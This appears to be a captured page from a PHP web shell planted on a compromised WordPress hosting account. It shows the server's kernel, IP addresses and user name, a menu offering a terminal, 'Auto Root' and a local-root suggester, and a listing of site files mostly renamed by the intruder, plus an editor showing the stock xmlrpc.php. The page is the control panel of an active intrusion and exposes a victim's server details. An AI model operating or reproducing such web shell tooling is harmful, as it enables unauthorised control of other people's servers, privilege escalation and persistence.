Linux premium256.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
niyknzcu /
whiteteakllc.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb__d97c8de
[ DIR ]
drwxrwxrwx
2026-04-20 06:37
.well-known__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
68c37776
[ DIR ]
drwxr-xr-x
2026-04-20 13:24
cgi-bin__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
fb1be__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
test__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
wp-admin__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
wp-content__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
wp-includes__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
.hcflag__d97c8de
31
B
-rw-r--r--
2026-04-14 16:31
.htaccess
498
B
-rw-r--r--
2026-04-24 05:56
.htaccess.bk__d97c8de
1.96
KB
-rw-r--r--
2024-03-05 08:05
.litespeed_flag__d97c8de
297
B
-rw-r--r--
2026-04-20 01:36
error_log
352
B
-rw-r--r--
2026-04-20 06:30
error_log__d97c8de
22.91
KB
-rw-r--r--
2026-04-20 04:08
google2b4ed44d8f7447b4.html
53
B
-rw-r--r--
2026-04-27 08:04
google3a2fa76329422a80.html__d97c8de
53
B
-rw-r--r--
2026-03-27 06:21
index.php
95.65
KB
-rw-r--r--
2026-04-20 07:54
license.txt__d97c8de
19.44
KB
-rw-r--r--
2025-12-03 01:11
readme.html__d97c8de
7.25
KB
-rw-r--r--
2026-03-16 09:43
style.php__d97c8de
26
B
-rw-r--r--
2026-03-29 01:13
txets.php
5.91
KB
-r--r--r--
2026-04-24 05:56
wZhOSd6abp2KhPym0JL47qeEVHc4oBDB.php__d97c8de
243
B
-rw-r--r--
2026-03-24 21:04
wp-activate.php__d97c8de
7.18
KB
-rw-r--r--
2025-12-03 01:11
wp-blog-header.php__d97c8de
361
B
-rw-r--r--
2026-04-18 22:45
wp-comments-post.php__d97c8de
2.27
KB
-rw-r--r--
2024-03-04 07:30
wp-config-sample.php__d97c8de
6
KB
-rw-r--r--
2026-04-17 01:36
wp-config.php__d97c8de
3.31
KB
-rw-r--r--
2026-04-18 22:47
wp-links-opml.php__d97c8de
2.43
KB
-rw-r--r--
2025-12-03 01:11
wp-load.php__d97c8de
3.88
KB
-rw-r--r--
2026-04-18 22:50
wp-login.php__d97c8de
50.23
KB
-rw-r--r--
2025-12-03 01:11
wp-mail.php__d97c8de
8.52
KB
-rw-r--r--
2025-12-03 01:11
wp-settings.php__d97c8de
30.33
KB
-rw-r--r--
2026-04-18 22:44
wp-signup.php__d97c8de
33.71
KB
-rw-r--r--
2025-04-15 21:13
wp-trackback.php__d97c8de
5.09
KB
-rw-r--r--
2025-12-03 01:11
wp-xmlwhi.php__d97c8de
420
B
-rw-r--r--
2024-03-04 07:58
x.zip__d97c8de
5.59
KB
-rw-r--r--
2026-03-29 01:13
xmlrpc.php__d97c8de
3.13
KB
-rw-r--r--
2025-04-15 21:13
z000.gz__d97c8de
57.59
KB
-rw-r--r--
2026-03-29 01:08
Save
Rename
<?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is an XML-RPC Request. * * @var bool */ define( 'XMLRPC_REQUEST', true ); // Discard unneeded cookies sent by some browser-embedded clients. $_COOKIE = array(); // $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0. // phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved if ( ! isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } // Fix for mozBlog and other cases where '<?xml' isn't on the very first line. $HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA ); // phpcs:enable /** Include the bootstrap for setting up WordPress environment */ require_once __DIR__ . '/wp-load.php'; if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>'; ?> <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd"> <service> <engineName>WordPress</engineName> <engineLink>https://wordpress.org/</engineLink> <homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink> <apis> <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <?php /** * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint. * * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html * * @since 3.5.0 */ do_action( 'xmlrpc_rsd_apis' ); ?> </apis> </service> </rsd> <?php exit; } require_once ABSPATH . 'wp-admin/includes/admin.php'; require_once ABSPATH . WPINC . '/class-IXR.php'; require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php'; /** * Posts submitted via the XML-RPC interface get that title * * @name post_default_title * @var string */ $post_default_title = ''; /** * Filters the class used for handling XML-RPC requests. * * @since 3.1.0 * * @param string $class The name of the XML-RPC server class. */ $wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' ); $wp_xmlrpc_server = new $wp_xmlrpc_server_class(); // Fire off the request. $wp_xmlrpc_server->serve_request(); exit; /** * logIO() - Writes logging info to a file. * * @since 1.2.0 * @deprecated 3.4.0 Use error_log() * @see error_log() * * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging. * * @param string $io Whether input or output. * @param string $msg Information describing logging reason. */ function logIO( $io, $msg ) { _deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' ); if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) { error_log( $io . ' - ' . $msg ); } }